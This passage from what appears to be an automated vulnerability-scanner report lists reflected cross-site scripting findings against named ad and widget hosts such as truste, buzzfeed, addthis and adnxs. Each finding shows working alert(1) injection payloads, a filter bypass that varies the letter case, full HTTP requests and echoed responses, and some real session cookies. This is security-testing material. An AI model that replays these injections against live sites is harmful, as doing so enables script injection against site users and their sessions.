User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:12 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 4617

if (typeof truste == "undefined" || !truste) {    var truste= {};    truste.ca= {};    truste.ca.listeners = {};    truste.img = new Image(1,1);    truste.defjsload = false;        truste.ts = null; //initi
...[SNIP]...
</div>\n';    var te_clr1_att02cont3_bi = {    'baseName':'te-clr1-att02cont3',                            'anchName':'te-clr1-att02cont3-anch',                            'width':728,                            'height':90,                            'ox':20a5e47<script>alert(1)</script>27256ed0b74,                            'oy':0,                            'plc':'tr',                            'iplc':'ctr',                            'intDivName':'te-clr1-att02cont3-itl',                            'iconSpanId':'te-clr1-att02cont3-icon',                            'backgroundColor':'white',                            'opacity':
...[SNIP]...

3.45. http://choices.truste.com/ca [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload a3412<ScRiPt>alert(1)</ScRiPt>a3c6dbfee4b was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tra3412<ScRiPt>alert(1)</ScRiPt>a3c6dbfee4b&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:23 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3841

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
</div>\n';
var te_clr1_att02cont3_bi={baseName:"te-clr1-att02cont3",anchName:"te-clr1-att02cont3-anch",width:728,height:90,ox:20,oy:0,plc:"tra3412<ScRiPt>alert(1)</ScRiPt>a3c6dbfee4b",iplc:"ctr",intDivName:"te-clr1-att02cont3-itl",iconSpanId:"te-clr1-att02cont3-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att02cont3",noticeBaseUrl:"/camsg?",irBaseUrl:"/c
...[SNIP]...

3.46. http://choices.truste.com/ca [zi parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload c0abf<ScRiPt>alert(1)</ScRiPt>9538de4130f was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002c0abf<ScRiPt>alert(1)</ScRiPt>9538de4130f&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:18 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3841

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
uste.ca.hideoverlay(te_clr1_att02cont3_bi)",icon:"http://choices.truste.com/assets/admarker.png",icon_cam:"http://choices.truste.com/assets/adicon.png",iconText:"",aid:"att02",pid:"mec01",zindex:"10002c0abf<ScRiPt>alert(1)</ScRiPt>9538de4130f",cam:"2",cid:"0311wl728x90"};
var tecabaseurl="http://choices.truste.com/";truste.ca.addEvent(window,"load",function(){var a=te_clr1_att02cont3_bi;
if(!truste.defjsload){var c=document.createElement("
...[SNIP]...

3.47. http://content.pulse360.com/cgi-bin/context.cgi [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /cgi-bin/context.cgi

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbbee'%3balert(1)//a187687dcce was submitted in the id parameter. This input was echoed as fbbee';alert(1)//a187687dcce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/context.cgi?id=91041742fbbee'%3balert(1)//a187687dcce&ganid=floridatoday&gans=news&ganss=&format=bare&ganst=&title=1&signup=1 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:36 GMT
Server: Barista/1.1-(eankbk)
Connection: Close
Content-Length: 3465
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"

document.write('<style type="text/css">.p360_listing { cursor: pointer;}</style><!--Ad Markup by Seevast--><div id="p360_ad_unit"><div id="p360_header"><div class="p360_aligner_left"><span id="p360_
...[SNIP]...
<a target="_Blank" href="https://ads.pulse360.com/advertisers.html?refid=91041742fbbee';alert(1)//a187687dcce" style="color: inherit; text-decoration: inherit;" >
...[SNIP]...

3.48. http://ct.buzzfeed.com/wd/UserWidget [amp;or parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ct.buzzfeed.com
Path:   /wd/UserWidget

Issue detail

The value of the amp;or request parameter is copied into the HTML document as plain text between tags. The payload 1726d<script>alert(1)</script>283b85948bd was submitted in the amp;or parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wd/UserWidget?u=www.thevine.com.au&amp;to=1&amp;or=vb1726d<script>alert(1)</script>283b85948bd&amp;wid=1&amp;cb=1304949685154 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=ISO-8859-1
Date: Mon, 09 May 2011 14:07:14 GMT
Server: lighttpd bf1
Content-Length: 597

bless({
"-file" => "lib/buzzfeed/wd/controller/UserWidget.pm",
"-line" => 143,
"-package" => "buzzfeed::wd::controller::UserWidget",
"-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb1726d<script>alert(1)</script>283b85948bd&wid=1&to=1&u=www.thevine.com.au - Internal Server Error",
}, "Error::Simple")

unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb1726d<script>
...[SNIP]...

3.49. http://ct.buzzfeed.com/wd/UserWidget [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ct.buzzfeed.com
Path:   /wd/UserWidget

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload bb541<script>alert(1)</script>ed88bb99e34 was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wd/UserWidget?u=www.thevine.com.aubb541<script>alert(1)</script>ed88bb99e34&amp;to=1&amp;or=vb&amp;wid=1&amp;cb=1304949685154 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=ISO-8859-1
Date: Mon, 09 May 2011 14:07:12 GMT
Server: lighttpd bf1
Content-Length: 597

bless({
"-file" => "lib/buzzfeed/wd/controller/UserWidget.pm",
"-line" => 143,
"-package" => "buzzfeed::wd::controller::UserWidget",
"-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=www.thevine.com.aubb541<script>alert(1)</script>ed88bb99e34 - Internal Server Error",
}, "Error::Simple")

unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=www.thevine.com.aubb541<script>
...[SNIP]...

3.50. http://ds.addthis.com/red/psi/sites/www.irishtimes.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.irishtimes.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 84ed8<script>alert(1)</script>75de7d1f973 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.irishtimes.com/p.json?callback=_ate.ad.hpr84ed8<script>alert(1)</script>75de7d1f973&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.irishtimes.com%2Fnewspaper%2Ftheticket%2F2011%2F0506%2F1224296203710.html&1nv0nd4 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=1304471550.60|1304471550.1OD|1304471550.1FE; dt=X; psc=4; uid=4dab4fa85facd099; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 399
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 09 May 2011 14:04:33 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 08 Jun 2011 14:04:33 GMT; Path=/
Set-Cookie: di=%7B%7D..1304949873.1FE|1304949873.60; Domain=.addthis.com; Expires=Wed, 08-May-2013 08:22:03 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 09 May 2011 14:04:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 14:04:33 GMT
Connection: close

_ate.ad.hpr84ed8<script>alert(1)</script>75de7d1f973({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.irishti
...[SNIP]...

3.51. http://edge.viagogo.co.uk/feeds/widget.ashx [PCID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge.viagogo.co.uk
Path:   /feeds/widget.ashx

Issue detail

The value of the PCID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e596e"style%3d"x%3aexpression(alert(1))"a69dbd9369d was submitted in the PCID parameter. This input was echoed as e596e"style="x:expression(alert(1))"a69dbd9369d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /feeds/widget.ashx?category=rockandpoptickets&formatid=2&count=10&affiliateID=769&PCID=HAFFGBCLAREFWidg371EC42B62e596e"style%3d"x%3aexpression(alert(1))"a69dbd9369d HTTP/1.1
Host: edge.viagogo.co.uk
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=7200
Content-Type: text/html; charset=utf-8
Date: Mon, 09 May 2011 14:04:32 GMT
Expires: Mon, 09 May 2011 16:04:32 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: PCID=HAFFGBCLAREFWidg371EC42B62e596e"style="x:expression(alert(1))"a69dbd9369d; domain=viagogo.co.uk; expires=Wed, 08-Jun-2011 14:04:32 GMT; path=/; HttpOnly
Set-Cookie: vTrack=769; domain=viagogo.co.uk; expires=Wed, 08-Jun-2011 14:04:32 GMT; path=/; HttpOnly
Set-Cookie: .VGGANON=8nITaAQwzgEkAAAAN2NkY2E2ZGUtMDAyYS00OGJlLWI1N2QtYzZjNWZjOTU2NTg30; domain=viagogo.co.uk; expires=Wed, 03-Apr-2013 00:44:32 GMT; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 4250

<style type="text/css">
/* CSS STARTS HERE */
.go_simple_widget {border:1px solid #bfbfc0; margin:0px; padding:0px;}
.go_simple_widget h1 {margin:0px; padding: 4px 0px 4px 8px; border-bottom:1px
...[SNIP]...
<a href="http://www.viagogo.co.uk/Concert-Tickets/Rock-and-Pop/Take-That-Tickets?AffiliateID=769&PCID=HAFFGBCLAREFWidg371EC42B62e596e"style="x:expression(alert(1))"a69dbd9369d" title="Take That Tickets" target="_blank">
...[SNIP]...

3.52. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload d1b1e<script>alert(1)</script>b22bf009d9c was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.indianasnewscenter.com%2Fnews%2Flocal%2FAt-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html&uid=9ByavNwWFmRBp6h6_40792835d1b1e<script>alert(1)</script>b22bf009d9c&xy=0%2C0&wh=728%2C90&vchannel=382765&cid=Toyota_2011_RAAP&iad=1304949550599-23798237647861244&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26;sz=728x90;ord=[timestamp]?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9C64981B8EF23259D938F84387571176; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Mon, 09 May 2011 13:59:26 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("9ByavNwWFmRBp6h6_40792835d1b1e<script>alert(1)</script>b22bf009d9c");

3.53. http://floridatoday.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://floridatoday.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48826'-alert(1)-'7bb1993fb0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=13767&48826'-alert(1)-'7bb1993fb0c=1 HTTP/1.1
Host: floridatoday.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7NwEAAAEvvajK5QA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwEAAAEv1Q+LnAA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 14:00:56 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwEAAAEv1Q+LnAA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 14:00:56 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:56 GMT
Age: 0
Connection: keep-alive
Content-Length: 11737

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
,aol,ask,live,bing",
'ids.aol':"10",
'fields.aol':"query,as_q,q",
'fields.ask':"q",
'fields.google':"q,as_q"};
$iTXT.js.serverUrl='http://floridatoday.us.intellitxt.com';$iTXT.js.pageQuery='ipid=13767&48826'-alert(1)-'7bb1993fb0c=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

3.54. http://ib.adnxs.com/ab [cnd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aedca'-alert(1)-'239f7d9d658 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=zszMzMzM_D_5U-Olm8T4PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BAgUCAAQAAAAAcC4a9AAAAAA.&tt_code=4455744&udj=uf%28%27a%27%2C+10005%2C+1304949637%29%3Buf%28%27c%27%2C+47078%2C+1304949637%29%3Buf%28%27r%27%2C+327251%2C+1304949637%29%3Bppv%289163%2C+%274297476271584241789%27%2C+1304949637%2C+1305122437%2C+47078%2C+49165%29%3B&cnd=!QxexlQjm7wIQ0_wTGAAgjYADKNkJMQAAAMDMzPw_QhMIABAAGAAgASj-__________8BSABQAFi5P2AAaOQCaedca'-alert(1)-'239f7d9d658&referrer=http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5EH26G%5ECP_ID%5E47078%5ESEG_CODES%5EH26G-8&pp=1.30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:01:02 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:02 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:02 GMT; domain=.adnxs.com; HttpOnly
